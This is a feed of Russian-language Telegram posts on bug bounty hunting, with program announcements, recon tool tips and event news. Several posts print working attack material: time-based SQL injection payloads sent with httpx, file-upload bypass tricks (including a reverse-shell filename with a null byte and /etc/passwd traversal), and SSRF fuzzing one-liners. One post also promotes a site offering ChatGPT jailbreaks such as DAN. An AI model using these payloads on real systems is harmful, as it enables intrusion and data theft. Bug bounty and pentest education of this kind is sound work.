Тинькофф в 2,5 раза увеличил выплаты за найденные уязвимости
Теперь багхантеры могут получить до 400 000 рублей. Можно искать пробелы во всех сервисах не только банка, но и Тинькофф Страхования, Тинькофф Инвестиций и в принципе на всех сайтах и в мобильных приложениях экосистемы. Всего в скоупе 4 домена, 11 сервисов и приложений.
Искать и подавать уязы можно на двух площадках, присоединяйтесь:
BugBounty.ru и BI.ZONE Bug Bounty.
Теперь багхантеры могут получить до 400 000 рублей. Можно искать пробелы во всех сервисах не только банка, но и Тинькофф Страхования, Тинькофф Инвестиций и в принципе на всех сайтах и в мобильных приложениях экосистемы. Всего в скоупе 4 домена, 11 сервисов и приложений.
Искать и подавать уязы можно на двух площадках, присоединяйтесь:
BugBounty.ru и BI.ZONE Bug Bounty.
👍22🤔4🔥1
🤖 Бесплатный ChatGPT
Если вы еще вдруг не видели, то есть удобный сайт, на котором можно запустить ChatGPT из браузера без смс и регистрации. Включает gpt-4/3.5, доступ в Интернет и gpt-джейлбрейки, такие как DAN. Кроме того, можно поднять локально собственную версию.
Ссылка на GitHub
Ссылка на сайт
#ai #tools
Если вы еще вдруг не видели, то есть удобный сайт, на котором можно запустить ChatGPT из браузера без смс и регистрации. Включает gpt-4/3.5, доступ в Интернет и gpt-джейлбрейки, такие как DAN. Кроме того, можно поднять локально собственную версию.
Ссылка на GitHub
Ссылка на сайт
#ai #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
👍25🔥2
Когда нужен читабельный вывод от ffuf:
ffuf -u https://target.com/FUZZ -w /mnt/data/SecLists/Discovery/Web-Content/raft-small-words.txt -o ffuf.csv -of csvcat ffuf.csv | awk -F , '{print $2","$5","$6","$9}'| column -s, -tUPD: для версии v2 и без наименования колонок:
cat ffuf.csv | awk -F , '{print $3","$6","$7","$10}' | column -s, -t | awk 'FNR>1'#web #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
👍32🔥7🤔2🤯1
🔎 Поиск поддоменов с помощью GPT
Инструмент, который пробует раскрыть потенциал нейросетей в поисках поддоменов сайта. Может служить неплохим дополнением ко всем остальным методам сбора.
SubGPT просматривает поддомены, которые вы уже обнаружили и использует BingGPT для поиска еще большего числа. Работает бесплатно!
Ссылка на инструмент
#web #tools #recon
Инструмент, который пробует раскрыть потенциал нейросетей в поисках поддоменов сайта. Может служить неплохим дополнением ко всем остальным методам сбора.
SubGPT просматривает поддомены, которые вы уже обнаружили и использует BingGPT для поиска еще большего числа. Работает бесплатно!
Ссылка на инструмент
#web #tools #recon
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12🔥12
Когда нужно проверить список доменов на Time-Based уязвимости и лень писать шаблон для Nuclei, можно заюзать httpx с параметрами
-timeout, для указания максимального таймаута и -mrt, для вывода только результатов с определенной задержкой.cat web.list | httpx -silent -path '/sitemap.xml?offset=1%3bSELECT%20IF((8303%3E8302)%2cSLEEP(10)%2c2356)%23' -rt -timeout 20 -mrt '>10'
Аналогично, для заголовков:cat web.list | httpx -silent -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(10),0))OR" -rt -timeout 20 -mrt '>10'
#web #sqli #tools #rcePlease open Telegram to view this post
VIEW IN TELEGRAM
👍21🔥4
✉️ Письмо, которое многие хотели бы получить: [Вы получили инвайт на закрытую тусовку багхантеров]
Но такое сообщение вы можете получить только от платформы Standoff 365 Bug Bounty, если являетесь ее активным участником(и находите много уязвимостей) .
Совсем недавно платформа запустила новую активити — первые priv8 багбаунти-ивенты в России Standoff Hacks. Группа исследователей в закрытом режиме и в экстремально сжатые сроки ломает ранее не исследованный скоуп или уже известный, но с повышенными выплатами.
И мы можем наблюдать первые результаты, которые не могут оставить равнодушными: за 5 дней было получено 130 отчетов на 2 программы от 37 багхантеров. Для сравнения стоит учесть то, что всего с момента запуска платформы (за год) было получено 1650 отчетов.
От этого формата поиска уязвимости получит профит каждый: багхантеры быстро получают свое вознаграждение, а компании результат, который поможет им укрепить безопасность своих продуктов.
Уже через несколько дней, а именно 13 мая на ивенте в Москве, будут объявлены результаты двухнедельного набега на инфраструктуру компаний, а исследователи разом получат все вознаграждения за найденные уязвимости и классно проведут время (all inclusive) 🤩
Следующий Standoff Hacks пройдет в августе, но уже не в Москве пока место остается под секретом🤫 , поэтому особенно советуем поучаствовать в этом мероприятии!
Пока еще есть время, не поздно апнуть свой рейтинг на платформе, чтобы повысить шанс получить инвайт!
Но такое сообщение вы можете получить только от платформы Standoff 365 Bug Bounty, если являетесь ее активным участником
Совсем недавно платформа запустила новую активити — первые priv8 багбаунти-ивенты в России Standoff Hacks. Группа исследователей в закрытом режиме и в экстремально сжатые сроки ломает ранее не исследованный скоуп или уже известный, но с повышенными выплатами.
И мы можем наблюдать первые результаты, которые не могут оставить равнодушными: за 5 дней было получено 130 отчетов на 2 программы от 37 багхантеров. Для сравнения стоит учесть то, что всего с момента запуска платформы (за год) было получено 1650 отчетов.
От этого формата поиска уязвимости получит профит каждый: багхантеры быстро получают свое вознаграждение, а компании результат, который поможет им укрепить безопасность своих продуктов.
Уже через несколько дней, а именно 13 мая на ивенте в Москве, будут объявлены результаты двухнедельного набега на инфраструктуру компаний, а исследователи разом получат все вознаграждения за найденные уязвимости и классно проведут время (all inclusive) 🤩
Следующий Standoff Hacks пройдет в августе, но уже не в Москве
Пока еще есть время, не поздно апнуть свой рейтинг на платформе, чтобы повысить шанс получить инвайт!
🔥9👍3🤔2
Forwarded from Just Security
Уязвимости в функциях загрузки файлов очень распространены.
При проведении анализа защищенности веб-приложений, важно знать, как обойти ограничения, так как это часто приводит к полной компрометации системы. А для разработчиков и инженеров полезно знать, как такие атаки происходят, чтобы корректно реализовать механизмы защиты.
Минимальный набор проверок File Upload:
→ Попробуйте различные расширения файлов: используйте разные варианты расширений файлов, например, php3, php4, php5, phtml для PHP-скриптов, asp, aspx и ashx для IIS. Список можно взять тут: https://github.com/danielmiessler/SecLists
→ Добавьте дополнительное расширение файла: если приложение не проверяет правильность расширения файла — добавьте еще одно расширение, например, из script.php в script.gif.php
→ Неправильная реализация Regex: например, некорректное регулярное выражение
→ Измените регистр расширения: попробуйте разные комбинации строчных и прописных букв, например, pHp, PhP, phP, Php и т.д.
→ Приложение позволяет загружать файлы .svg?: SVG изображения — это просто данные XML. Используя XML, можно, например, добиться XSS.
→ Измените тип контента: при перехвате запроса с помощью Burp Suite, тип контента можно изменить, например, с
→ Попробуйте использовать исполняемые расширения: могут быть разрешены определенные исполняемые расширения, например
→ Добавьте нулевой байт в имя файла: если сайт использует белые списки расширений файлов, их часто можно обойти, добавив
→ Вставьте данные EXIF: исполняемый скрипт может быть вставлен в изображение в форме метаданных комментария, который затем будет выполнен, если веб-сервер обрабатывают эти данные.
→ Попробуйте использовать обозначение Windows 8.3 для имени файла: можно использовать короткую версию имени файла Windows 8.3. Например,
→ Обход каталога: попробуйте использовать вместо имени файла
Полезные ссылки:
- Перезапись файла конфигурации сервера
- Обфускация расширений файлов
- Race condition при загрузке файлов
- Небезопасная десериализация, ведущая к полному захвату сервера
- OWASP Unrestricted File Upload
Накидывайте еще способы обхода и полезные ссылки по теме в комментарии!
При проведении анализа защищенности веб-приложений, важно знать, как обойти ограничения, так как это часто приводит к полной компрометации системы. А для разработчиков и инженеров полезно знать, как такие атаки происходят, чтобы корректно реализовать механизмы защиты.
Минимальный набор проверок File Upload:
→ Попробуйте различные расширения файлов: используйте разные варианты расширений файлов, например, php3, php4, php5, phtml для PHP-скриптов, asp, aspx и ashx для IIS. Список можно взять тут: https://github.com/danielmiessler/SecLists
→ Добавьте дополнительное расширение файла: если приложение не проверяет правильность расширения файла — добавьте еще одно расширение, например, из script.php в script.gif.php
→ Неправильная реализация Regex: например, некорректное регулярное выражение
".png|.jpeg" можно обойти с помощью следующей нагрузки bypasspng.php.→ Измените регистр расширения: попробуйте разные комбинации строчных и прописных букв, например, pHp, PhP, phP, Php и т.д.
→ Приложение позволяет загружать файлы .svg?: SVG изображения — это просто данные XML. Используя XML, можно, например, добиться XSS.
→ Измените тип контента: при перехвате запроса с помощью Burp Suite, тип контента можно изменить, например, с
"Content-type: application/x-php" на "Content-type: image/gif"
→ Добавьте magic байт в файл: магические байты служат подписями, которые используются веб-сервером для определения типа загружаемого файла. Например, добавив GIF87a в начало скрипта, сервер будет считать его файлом GIF. Например : Filename='1.php' , filetype: image/gif и начните содержимое файла с GIF29a
→ Попробуйте уменьшить размер файла: если используется ограничение размера файла, можно загрузить меньший скрипт для удаленного выполнения кода.→ Попробуйте использовать исполняемые расширения: могут быть разрешены определенные исполняемые расширения, например
.phtml, .shtml, .asa, .cer, .asax, .swf, или .xap.→ Добавьте нулевой байт в имя файла: если сайт использует белые списки расширений файлов, их часто можно обойти, добавив
%00 (HTML) или \x00 (hex) в конец имени файла. Например: php-reverse-shell.php%00.gif
→ Добавьте специальные символы перед расширением файла: на старых веб-серверах, добавление специальных символов, таких как ;%$&, сразу после имени файла, например, shell;.php, может помочь обойти белые списки расширений файлов.→ Вставьте данные EXIF: исполняемый скрипт может быть вставлен в изображение в форме метаданных комментария, который затем будет выполнен, если веб-сервер обрабатывают эти данные.
→ Попробуйте использовать обозначение Windows 8.3 для имени файла: можно использовать короткую версию имени файла Windows 8.3. Например,
shell.aspx станет SHELL~1.ASP
→ Попробуйте добавить нейтральные символы после имени файла: специальные символы, такие как пробелы или точки в Windows, или точки и слэши в Linux в конце имени файла, будут автоматически удалены (например, shell.aspx … … . . .. .., file.asp.).→ Обход каталога: попробуйте использовать вместо имени файла
../../../../etc/passwd и подобные, возможно, вы наткнетесь на новую уязвимостьПолезные ссылки:
- Перезапись файла конфигурации сервера
- Обфускация расширений файлов
- Race condition при загрузке файлов
- Небезопасная десериализация, ведущая к полному захвату сервера
- OWASP Unrestricted File Upload
Накидывайте еще способы обхода и полезные ссылки по теме в комментарии!
👍32🤔3
Если вы ищете уязвимости в Google, или хотите посмотреть, как это делали другие, то вот вам список статей из Bug Bounty программы Google VRP.
Ссылка на GitHub
#web #learn
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍6🤔1
📝 Пополняем свои вордлисты
Всегда, когда вижу подобные посты, проверяю наличие эндпоинта в своих словарях. И если эндпоинт «
#web #recon #leak
Всегда, когда вижу подобные посты, проверяю наличие эндпоинта в своих словарях. И если эндпоинт «
config.properties» встречается во многих словарях, то «ui_config.properties» я не нашел ни в одном из популярных. В связи с чем, рекомендую дополнить свои словари, так как тут может содержатся важная инфа вроде токенов и паролей.#web #recon #leak
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18🔥7
Небольшой рассказ про фаззинг API и эксплуатацию SQL инъекции в Azure CosmosDB.
Читать статью
#web #sqli
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
SQL-инъекция в скрытом API эндпоинте
Оригинал статьи на английском тут. В этой статье я поделюсь тем, как была обнаружена данная уязвимость. Все началось на этом простом веб-сайте, который содержит только страницу активации учетной записи. Вводим нашу почту, нажимаем Submit и перехватываем HTTP…
👍24🔥4
Тинькофф присоединился к платформе Standoff 365 Bug Bounty
В программу входит весь скоуп «*.tinkoff.ru».
За отчет можно получить до 400 000 рублей. Стоимость зависит от критичности бага.
❗️ Важно — пока участвовать в программе могут только индивидуальные предприниматели и самозанятые. Оформить можно за несколько минут, а сумму получите полную, так как Тинькофф компенсирует до 6% налоговых потерь.
Подробности — на странице программы.
В программу входит весь скоуп «*.tinkoff.ru».
За отчет можно получить до 400 000 рублей. Стоимость зависит от критичности бага.
❗️ Важно — пока участвовать в программе могут только индивидуальные предприниматели и самозанятые. Оформить можно за несколько минут, а сумму получите полную, так как Тинькофф компенсирует до 6% налоговых потерь.
Подробности — на странице программы.
👍13🔥1🤔1🤯1
Forwarded from Багхантер
🔥🔥 🔫 Волшебная папка про багбаунти
❗️Теперь все каналы и чаты на тему багбаунти можно добавить себе прямо сейчас в один клик в виде отдельной папки (Павел Дуров запилил нам крутой функционал) - вот эта папка.
В этой папке 26 активных чатов и телеграмм каналов на эту тему, всё что нужно багхантеру. Саму папку буду допиливать в процессе и мы соберем в ней всё, что вообще можно собрать про багбаунти.
😀 😀 😀
😀 😀 😀 Вы понимаете
😀 😀 😀 что нужно
😀 😀 😀 делать ;)
😀 😀 😀
😀 😀 😀
😀 😀 😀
🐹 Багхантер
❗️Теперь все каналы и чаты на тему багбаунти можно добавить себе прямо сейчас в один клик в виде отдельной папки (Павел Дуров запилил нам крутой функционал) - вот эта папка.
В этой папке 26 активных чатов и телеграмм каналов на эту тему, всё что нужно багхантеру. Саму папку буду допиливать в процессе и мы соберем в ней всё, что вообще можно собрать про багбаунти.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥22👍3🤯1
📝 Немного про активный сбор поддоменов
Puredns оказывается научился принимать на вход сразу весь список ваших доменов и в несколько потоков активно собирать сабы.
В добавок к этому, прикладываю ссылку на репозиторий с очень неплохим вордлистом. Там так же описывается чем он хорош и почему нам стоит его попробовать.
Кроме того, неплохой практикой будет выполнить пассивный сбор доменов с помощью amass, subfinder и др., и при помощи alterx собрать кастомный вордлист на основе полученных наименований сабов.
#web #recon
Puredns оказывается научился принимать на вход сразу весь список ваших доменов и в несколько потоков активно собирать сабы.
В добавок к этому, прикладываю ссылку на репозиторий с очень неплохим вордлистом. Там так же описывается чем он хорош и почему нам стоит его попробовать.
puredns bruteforce n0kovo_subdomains_huge.txt -d domain.list -r resolvers.txt -w puredns.listКроме того, неплохой практикой будет выполнить пассивный сбор доменов с помощью amass, subfinder и др., и при помощи alterx собрать кастомный вордлист на основе полученных наименований сабов.
#web #recon
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15
🎬 Видео с Positive Hack Days 12
Буквально недавно прошла конференция PHD12 и на ютуб выложили видео с докладами. Ссылку на плейлист прикладываю ниже.
Лично я посмотреть успел далеко не всё, но вот кое-что из того, что уже успел посмотреть:
▫️Праздник к нам приходит атаки на новогодние сайты и страницы промоакций
Про уязвимости на страницах промоакций и "праздничных" сайтах компаний.
▫️g/vrp
Про багхантинг на Google VRP.
▫️Геопространственная разведка на вашем рабочем столе
Про то, как искать информацию по фото и гео-данным с инструментами и реальными кейсами.
▫️Интервью с победителями Standoff Hacks о багхантинге
Топовые багхантеры рассказывают про свой опыт на Standoff Hacks.
▫️А что, так можно было? 15 малоизвестных приемов OSINT
Про то, как сливаются ваши данные и как их используют.
▫️Red teaming: методики фишинговых атак
Про инструменты и техники применяемые при фишинговых атаках на пользователей.
▫️Социальная инженерия: тенденнции red team, технические аспектц kill chain и проектный опыт
Про атаки с использованием методов социальной инженерии
Ссылка на плейлист
#web #osint #redteam
Буквально недавно прошла конференция PHD12 и на ютуб выложили видео с докладами. Ссылку на плейлист прикладываю ниже.
Лично я посмотреть успел далеко не всё, но вот кое-что из того, что уже успел посмотреть:
▫️Праздник к нам приходит атаки на новогодние сайты и страницы промоакций
Про уязвимости на страницах промоакций и "праздничных" сайтах компаний.
▫️g/vrp
Про багхантинг на Google VRP.
▫️Геопространственная разведка на вашем рабочем столе
Про то, как искать информацию по фото и гео-данным с инструментами и реальными кейсами.
▫️Интервью с победителями Standoff Hacks о багхантинге
Топовые багхантеры рассказывают про свой опыт на Standoff Hacks.
▫️А что, так можно было? 15 малоизвестных приемов OSINT
Про то, как сливаются ваши данные и как их используют.
▫️Red teaming: методики фишинговых атак
Про инструменты и техники применяемые при фишинговых атаках на пользователей.
▫️Социальная инженерия: тенденнции red team, технические аспектц kill chain и проектный опыт
Про атаки с использованием методов социальной инженерии
Ссылка на плейлист
#web #osint #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👍6
Когда при фаззинге вас блокируют по IP за большое число запросов, а рабочих прокси нет под рукой, то можно заюзать Tor. Скорость будет не фонтан, но если очень хочется обойти ограничение, то пойдет.
Ссылка на статью
#web #fuzz #recon
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Обход Rate Limit'а с помощью Tor
Оригинал статьи на английском тут. Тема статьи - как мы можем обойти запрос на ограничение скорости с которым мы часто сталкиваемся из-за фаззинга. Шаг 1 Устанавливаем тор sudo apt install tor Шаг 2 Редактируем конфиг тора vim /etc/tor/torrc SocksPort 9050…
👍19
Почти во всех однострочниках для поиска SSRF и Open Redirect'a используют qsreplace. Однако, главная проблема этого инструмента в том, что он заменяет абсолютно все значения параметров, в том числе и те, без которых запрос не будет выполняться.
Чтобы этого избежать, на просторах гитхаба нашелся простой скрипт, который заменяет только значения, содержащие url, что может быть более эффективно для автоматизированного тестирования.
Собираем список url адресов, отсеиваем идентичные с помощью uro и подставляем свой сервер или Burp Collab вместо
xxxx.oastify.com.cat allUrls.txt | grep "=" | grep -v "==" | uro | qsreplaceBetter http://xxxx.oastify.com | httpx -silent -sc -frСсылка на Github
#web #ssrf
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥5🤔2
Сегодня на канале Багхантер намечается трансляция, где сотни хакеров в прямом эфире будут ломать два сайта (разумеется легально и с разрешения владельцев сайта). Все подробности, правила, ограничения и план мероприятия вы можете узнать из данного поста.
В результате мероприятия будет выбран победитель, за которого будут голосовать топовые багхантеры, приглашенные на трансляцию в качестве жюри. Призовой фонд составит 150 TON.
Движуха крайне интересная, поэтому рекомендую всем желающим принять участие в качестве багхантеров или просто зрителей. Должно быть интересно.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍3🤯1
Отличная статья и видео-разбор, в котором вы узнаете, почему в Codeigniter, иногда можно обойти авторизацию с помощью пустого или рандомного JSON, а также обычной SQL инъекции в названии параметра.
Ссылка на YouTube
#web #sqli #code
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Authentication Bypass Using Root Array
Lots of #bugbountytips get posted on twitter, but some of them are ... weird. Let's explore the technical details of one tweet to understand where this tip came from, why this tip was wrong, and eventually learn about the real underlaying vulnerability. This…
👍11
Forwarded from Карьера в Kaspersky
Слышали об этичных хакерах? 🌐 Это те самые ребята, которые ищут уязвимости, но не извлекают из этого выгоды и не совершают преступлений. Познакомиться с ними было можно на прошедшем в Москве форуме, где эксперты по информационной безопасности общались с этичными хакерами со всего мира.
Впервые за 12 лет существования форума провели его в формате киберфестиваля с зонами для широкой аудитории и панелями для профессионалов. Разумеется, выступали и наши коллеги:
💚 В шатре с говорящим названием «Зал боевых искусств» обсуждали offensive security. Александр Коротин представил исследование «Компрометация сети через средства резервного копирования», а Владислав Тушканов прочитал лекцию «Prompt Injection и все-все-все: вытаскиваем максимум из AI-сервиса».
💚 В шатре «Школа самообороны» говорили о противоположном подходе. Сергей Голованов из Kaspersky и Евгений Волошин из BIZONE представили доклад «Долгие атаки».
Всего команда Kaspersky презентовала более 10 докладов и исследований. Больше записей исследований от экспертов Kaspersky можно посмотреть здесь: https://kas.pr/vx43
Хотите ещё больше изучить тему кибербезопасности? Почитайте нашу новую статью «А у вас в окнах дырки! Пентесты Windows-приложений: кейсы, инструменты и рекомендации» на «Хабре» 👈🏼
#Kaspersky_events
Впервые за 12 лет существования форума провели его в формате киберфестиваля с зонами для широкой аудитории и панелями для профессионалов. Разумеется, выступали и наши коллеги:
💚 В шатре с говорящим названием «Зал боевых искусств» обсуждали offensive security. Александр Коротин представил исследование «Компрометация сети через средства резервного копирования», а Владислав Тушканов прочитал лекцию «Prompt Injection и все-все-все: вытаскиваем максимум из AI-сервиса».
💚 В шатре «Школа самообороны» говорили о противоположном подходе. Сергей Голованов из Kaspersky и Евгений Волошин из BIZONE представили доклад «Долгие атаки».
Всего команда Kaspersky презентовала более 10 докладов и исследований. Больше записей исследований от экспертов Kaspersky можно посмотреть здесь: https://kas.pr/vx43
Хотите ещё больше изучить тему кибербезопасности? Почитайте нашу новую статью «А у вас в окнах дырки! Пентесты Windows-приложений: кейсы, инструменты и рекомендации» на «Хабре» 👈🏼
#Kaspersky_events
👍6🤔2🤯1
Forwarded from Заметки Bug Bounty Hunter'а
📢 Уважаемые подписчики!
🦈 Хочу поделиться с вами своим собственным Open Source решением для генерации CSRF PoC под названием
✨ Изначально я задумывал его для своих личных нужд, но понял, что он может быть полезен и другим исследователям в области информационной безопасности. Поэтому было принято решение опубликовать код инструмента на GitHub.
💡 Что делает этот инструмент особенным? Его отличительной особенностью является возможность генерации постоянной ссылки на результат. Это означает, что вы можете просто указать ссылку в своем отчете, а команда безопасности сможет легко и быстро проверить работоспособность PoC. Удобство в действии! 👌
🔒 Ах да, чуть не забыл. Все необходимые данные передаются в хэше URL, а следовательно, сервер не знает никаких подробностей о вашем запросе.
💪 Надеюсь,
✉️ Если у вас есть какие-либо вопросы или предложения, не стесняйтесь обращаться ко мне. Актуальный контакт для связи всегда можно найти в GitHub репозитории.
🔗 Ссылки:
👉 https://csrfshark.github.io/
👉 https://github.com/csrfshark/app/
🦈 Хочу поделиться с вами своим собственным Open Source решением для генерации CSRF PoC под названием
CSRFShark!✨ Изначально я задумывал его для своих личных нужд, но понял, что он может быть полезен и другим исследователям в области информационной безопасности. Поэтому было принято решение опубликовать код инструмента на GitHub.
CSRFShark полностью бесплатный, распространяется по лицензии MIT.💡 Что делает этот инструмент особенным? Его отличительной особенностью является возможность генерации постоянной ссылки на результат. Это означает, что вы можете просто указать ссылку в своем отчете, а команда безопасности сможет легко и быстро проверить работоспособность PoC. Удобство в действии! 👌
🔒 Ах да, чуть не забыл. Все необходимые данные передаются в хэше URL, а следовательно, сервер не знает никаких подробностей о вашем запросе.
💪 Надеюсь,
CSRFShark сможет стать незаменимым помощником для ваших исследований в сфере веб безопасности!✉️ Если у вас есть какие-либо вопросы или предложения, не стесняйтесь обращаться ко мне. Актуальный контакт для связи всегда можно найти в GitHub репозитории.
🔗 Ссылки:
👉 https://csrfshark.github.io/
👉 https://github.com/csrfshark/app/
👍8🔥8
Исследователь не поленился и записал три PoC'а для уязвимостей, найденных на одном из сервисов IBM.
1. IDOR в API, приводящий к извлечению личных данных и паролей всех пользователей.
2. Повышение привилегий до администратора через изменение роли.
3. Манипулирование запросом приводящее к обходу регистрации в панели сотрудников и манипулирование ответом приводящее к захвату учетной записи.
#web #ato #idor #privesc
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17🔥11